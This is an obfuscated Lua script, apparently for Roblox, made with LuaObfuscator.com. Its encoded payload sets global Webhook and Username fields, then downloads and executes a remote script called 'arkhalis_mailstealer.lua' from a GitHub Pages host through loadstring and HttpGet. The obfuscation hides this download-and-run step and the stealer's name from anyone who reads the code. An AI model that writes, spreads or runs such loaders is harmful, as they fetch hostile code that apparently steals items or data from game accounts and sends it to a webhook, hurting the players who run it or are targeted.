--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v68=v2(v0(v30,16));if v19 then local v74=v5(v68,v19);v19=nil;return v74;else return v68;end end end);local function v20(v31,v32,v33)if v33 then local v69=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + (1701 -(1523 + 114)))))) ;return v69-(v69%(932 -(857 + 74))) ;else local v70=(570 -(367 + (1078 -(282 + 595))))^(v32-((834 + 94) -(214 + 713))) ;return (((v31%(v70 + v70))>=v70) and (1 + 0)) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + 2 ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + 4 ;return (v40 * ((16443059 + 335427) -(226 + 1044))) + (v39 * (285370 -219834)) + (v38 * (373 -(32 + 85))) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=(1 -0) + 0 ;local v44=(v20(v42,958 -(892 + 65 + 0) ,47 -(818 -(368 + 423)) ) * (((9 -6) -1)^(58 -26))) + v41 ;local v45=v20(v42,39 -(10 + 8) ,(1465 -1084) -(87 + 263) );local v46=((v20(v42,212 -(67 + (247 -134)) )==(1 + 0)) and  -(2 -1)) or (1 + 0) ;if (v45==(0 -0)) then if (v44==(952 -(802 + (592 -(416 + 26))))) then return v46 * (0 -0) ;else local v75=0 -0 ;while true do if (v75==(0 + (0 -0))) then v45=998 -(915 + 82) ;v43=0 -0 ;break;end end end elseif (v45==(1193 + 854)) then return ((v44==(0 -0)) and (v46 * ((1188 -(1069 + 118))/0))) or (v46 * NaN) ;end return v8(v46,v45-((404 + 1916) -1297) ) * (v43 + (v44/(2^52))) ;end local function v25(v47)local v48;if  not v47 then v47=v23();if (v47==(0 + 0)) then return "";end end v48=v3(v16,v18,(v18 + v47) -(439 -(145 + 293)) );v18=v18 + v47 ;local v49={};for v64=1 -0 , #v48 do v49[v64]=v2(v1(v3(v48,v64,v64)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=0;local v51;local v52;local v53;local v54;local v55;local v56;while true do local v66=0 -0 ;local v67;while true do if (v66~=(935 -(39 + 896))) then else v67=0;while true do if (v67~=(0 -0)) then else local v93=0 -0 ;while true do if (v93~=1) then else v67=1;break;end if (v93==(0 -0)) then if (v50~=2) then else for v124=2 -1 ,v23() do local v125=0;local v126;local v127;local v128;while true do if (v125~=0) then else v126=0 + 0 ;v127=nil;v125=2 -1 ;end if (v125~=(1 + 0)) then else v128=nil;while true do if (v126==(396 -(115 + 281))) then v127=0 -0 ;v128=nil;v126=1 + 0 ;end if ((1 + 0)==v126) then while true do if (v127==(0 -0)) then v128=v21();if (v20(v128,1,1)==(0 -0)) then local v166=0 -0 ;local v167;local v168;local v169;local v170;while true do if (v166~=2) then else while true do if (v167==(868 -(550 + 317))) then local v174=0 -0 ;local v175;local v176;while true do if (v174==1) then while true do if (v175==(0 -0)) then v176=0 -0 ;while true do if ((286 -(134 + 151))~=v176) then else v167=1667 -(970 + 695) ;break;end if (v176~=(0 -0)) then else local v190=65 -(30 + 35) ;local v191;while true do if ((0 -0)==v190) then v191=1990 -(582 + 1408) ;while true do if (v191==(3 -2)) then v176=1 + 0 ;break;end if (v191~=(0 -0)) then else local v192=1257 -(1043 + 214) ;while true do if (v192==(0 -0)) then v170={v22(),v22(),nil,nil};if (v168==(1824 -(1195 + 629))) then local v193=0 -0 ;local v194;while true do if (v193==(241 -(187 + 54))) then v194=0;while true do if (v194~=0) then else v170[3]=v22();v170[4]=v22();break;end end break;end end elseif (v168==(781 -(162 + 618))) then v170[3 + 0 ]=v23();elseif (v168==(582 -(361 + 219))) then v170[3]=v23() -(2^(336 -(53 + 267))) ;elseif (v168~=(1 + 2)) then else local v199=0 + 0 ;local v200;while true do if (v199~=(413 -(15 + 398))) then else v200=0 -0 ;while true do if (v200~=0) then else v170[985 -(18 + 964) ]=v23() -((2 -0)^16) ;v170[1 + 3 ]=v22();break;end end break;end end end v192=1637 -(1373 + 263) ;end if (v192~=1) then else v191=1001 -(451 + 549) ;break;end end end end break;end end end end break;end end break;end if (v174~=(0 + 0)) then else v175=0 -0 ;v176=nil;v174=1 -0 ;end end end if ((2 + 0)==v167) then local v177=0;while true do if ((1384 -(746 + 638))==v177) then local v183=0;while true do if (v183~=1) then else v177=1;break;end if ((0 + 0)==v183) then if (v20(v169,1 -0 ,739 -(542 + 196) )~=(342 -(218 + 123))) then else v170[1583 -(1535 + 46) ]=v56[v170[3 -1 ]];end if (v20(v169,2 + 0 ,1 + 1 )~=(561 -(306 + 254))) then else v170[1 + 2 ]=v56[v170[7 -4 ]];end v183=1 -0 ;end end end if ((1468 -(899 + 568))==v177) then v167=2 + 1 ;break;end end end if (v167==0) then local v178=0 -0 ;local v179;while true do if ((603 -(268 + 335))==v178) then v179=0 -0 ;while true do if (v179~=(1122 -(118 + 1003))) then else v167=291 -(60 + 230) ;break;end if (v179==(572 -(426 + 146))) then local v184=0;local v185;while true do if (v184==(0 + 0)) then v185=0 -0 ;while true do if (v185~=(1 + 0)) then else v179=978 -(553 + 424) ;break;end if ((0 -0)==v185) then v168=v20(v128,2,1459 -(282 + 1174) );v169=v20(v128,815 -(569 + 242) ,17 -11 );v185=1 + 0 ;end end break;end end end end break;end end end if (v167==(2 + 1)) then if (v20(v169,3,3)~=(1 + 0)) then else v170[3 + 1 ]=v56[v170[4]];end v51[v124]=v170;break;end end break;end if (v166==(0 + 0)) then local v171=1024 -(706 + 318) ;while true do if (v171==(1252 -(721 + 530))) then v166=1272 -(945 + 326) ;break;end if (0==v171) then v167=0 -0 ;v168=nil;v171=1 + 0 ;end end end if (v166~=1) then else local v172=700 -(271 + 429) ;while true do if (v172~=(0 + 0)) then else v169=nil;v170=nil;v172=1501 -(1408 + 92) ;end if (v172==1) then v166=755 -(239 + 514) ;break;end end end end end break;end end break;end end break;end end end for v129=1,v23() do v52[v129-(1087 -(461 + 625)) ]=v28();end return v54;end if (v50==0) then v51={};v52={};v53={};v54={v51,v52,nil,v53};v50=1 + 0 ;end v93=1 + 0 ;end end end if (v67~=(1172 -(418 + 753))) then else if (v50==1) then local v98=0;while true do if (v98==1) then for v131=1,v55 do local v132=0 + 0 ;local v133;local v134;local v135;local v136;while true do if (v132==(0 -0)) then v133=1202 -(373 + 829) ;v134=nil;v132=1 + 0 ;end if (v132~=(1 + 0)) then else v135=nil;v136=nil;v132=2 + 0 ;end if (v132~=2) then else while true do if (v133==(0 + 0)) then local v162=0 -0 ;while true do if (v162==1) then v133=530 -(406 + 123) ;break;end if (v162==0) then v134=0;v135=nil;v162=1770 -(1749 + 20) ;end end end if (v133==(1 + 0)) then v136=nil;while true do if (v134~=0) then else local v163=1322 -(1249 + 73) ;local v164;while true do if (v163~=(238 -(64 + 174))) then else v164=0 + 0 ;while true do if ((1 + 0)==v164) then v134=1;break;end if ((1145 -(466 + 679))==v164) then local v173=0;while true do if (v173~=(1 -0)) then else v164=1;break;end if ((336 -(144 + 192))~=v173) then else v135=v21();v136=nil;v173=2 -1 ;end end end end break;end end end if (v134~=(217 -(42 + 174))) then else if (v135==(2 -1)) then v136=v21()~=0 ;elseif (v135==(1902 -(106 + 1794))) then v136=v24();elseif (v135~=(2 + 1)) then else v136=v25();end v56[v131]=v136;break;end end break;end end break;end end end v54[3]=v21();v98=2;end if (v98==0) then local v118=1504 -(363 + 1141) ;while true do if (v118~=1) then else v98=1581 -(1183 + 397) ;break;end if ((0 -0)~=v118) then else v55=v23();v56={};v118=1 + 0 ;end end end if (v98==(2 + 0)) then v50=1 + 1 ;break;end end end break;end end break;end end end end local function v29(v57,v58,v59)local v60=0;local v61;local v62;local v63;while true do if (v60==1) then v63=v57[3];return function(...)local v76=v61;local v77=v62;local v78=v63;local v79=v27;local v80=1;local v81= -1;local v82={};local v83={...};local v84=v12("#",...) -1 ;local v85={};local v86={};for v90=0,v84 do if (v90>=v78) then v82[v90-v78 ]=v83[v90 + 1 ];else v86[v90]=v83[v90 + 1 ];end end local v87=(v84-v78) + 1 ;local v88;local v89;while true do v88=v76[v80];v89=v88[1];if (v89<=5) then if (v89<=2) then if (v89<=0) then for v119=v88[2],v88[3] do v86[v119]=nil;end elseif (v89==1) then v86[v88[2]][v88[3]]=v88[4];else v86[v88[2]]=v88[3]~=0 ;end elseif (v89<=3) then v86[v88[2]]=v88[3];elseif (v89==4) then v86[v88[2]]=v59[v88[3]];else v86[v88[2]]();end elseif (v89<=8) then if (v89<=6) then local v101;local v102,v103;local v104;local v105;v86[v88[2]][v88[3]]=v88[4];v80=v80 + 1 ;v88=v76[v80];v86[v88[2]]=v59[v88[3]];v80=v80 + 1 ;v88=v76[v80];v86[v88[2]]=v59[v88[3]];v80=v80 + 1 ;v88=v76[v80];v105=v88[2];v104=v86[v88[3]];v86[v105 + 1 ]=v104;v86[v105]=v104[v88[4]];v80=v80 + 1 ;v88=v76[v80];v86[v88[2]]=v88[3];v80=v80 + 1 ;v88=v76[v80];v86[v88[2]]=v88[3]~=0 ;v80=v80 + 1 ;v88=v76[v80];v105=v88[2];v102,v103=v79(v86[v105](v13(v86,v105 + 1 ,v88[3])));v81=(v103 + v105) -1 ;v101=0;for v121=v105,v81 do v101=v101 + 1 ;v86[v121]=v102[v101];end v80=v80 + 1 ;v88=v76[v80];v105=v88[2];v86[v105]=v86[v105](v13(v86,v105 + 1 ,v81));v80=v80 + 1 ;v88=v76[v80];v86[v88[2]]();v80=v80 + 1 ;v88=v76[v80];v80=v88[3];elseif (v89==7) then if (v86[v88[2]]==v88[4]) then v80=v80 + 1 ;else v80=v88[3];end else v80=v88[3];end elseif (v89<=10) then if (v89>9) then local v143=v88[2];v86[v143]=v86[v143](v13(v86,v143 + 1 ,v81));else local v145=v88[2];local v146,v147=v79(v86[v145](v13(v86,v145 + 1 ,v88[3])));v81=(v147 + v145) -1 ;local v148=0;for v152=v145,v81 do local v153=0;while true do if (v153==0) then v148=v148 + 1 ;v86[v152]=v146[v148];break;end end end end elseif (v89>11) then do return;end else local v149=0;local v150;local v151;while true do if (v149==1) then v86[v150 + 1 ]=v151;v86[v150]=v151[v88[4]];break;end if (0==v149) then v150=v88[2];v151=v86[v88[3]];v149=1;end end end v80=v80 + 1 ;end end;end if (0==v60) then v61=v57[1];v62=v57[2];v60=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B034O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403363O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F61726B68616C69735F6D61696C737465616C65722E6C756103093O00557365726E616D653103093O00557365726E616D653200253O0012033O00016O000100013O0026073O0002000100010004083O00020001001203000100013O00260700010012000100020004083O00120001001204000200033O00300600020004000500122O000200063O00122O000300073O00202O00030003000800122O000500096O000600016O000300066O00023O00024O00020001000100044O0024000100260700010005000100010004083O00050001001203000200013O0026070002001C000100010004083O001C0001001204000300033O0030010003000A0005001204000300033O0030010003000B0005001203000200023O00260700020015000100020004083O00150001001203000100023O0004083O000500010004083O001500010004083O000500010004083O002400010004083O000200012O000C3O00017O00",v9(),...);end
